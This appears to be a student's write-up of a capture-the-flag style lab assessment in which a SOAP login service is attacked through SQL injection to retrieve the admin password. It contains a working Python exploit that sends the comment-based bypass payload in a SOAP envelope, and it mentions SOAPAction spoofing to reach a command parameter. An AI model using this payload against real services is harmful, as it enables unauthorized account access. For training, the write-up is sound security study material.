Skills Assessment
Task
Our client tasks us with assessing a SOAP web service whose WSDL file resides at http://<TARGET IP>:3002/wsdl?wsdl.
Assess the target, identify an SQL Injection vulnerability through SOAP messages and answer the question below.
Submit the password of the user that has a username of “admin”. Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
Attempt
First let’s just access that wsdl file:
curl -s http://10.129.254.109:3002/wsdl?wsdl
It has LoginRequest SOAPAction :
<s:element name="LoginRequest">
<s:complexType>
<s:sequence>
<s:element minOccurs="1" maxOccurs="1" name="username" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="password" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
I actually thought of SOAPAction spoofing to use ExecuteCommand’s parameter (cmd) at first but since the task specifies it’s SQLi related, I focused on this.
Python exploit:
import requests
payload = "admin' -- -"
data = f'<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:tns="http://tempuri.org/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soap:Body> <LoginRequest xmlns="http://tempuri.org/"> <username>{payload}</username> <password>pass</password> </LoginRequest> </soap:Body> </soap:Envelope>'
print(requests.post("http://10.129.254.109:3002/wsdl", data=data, headers={"SOAPAction":'"Login"'}).content)
Saved as soap_sqli.py and ran it. Done.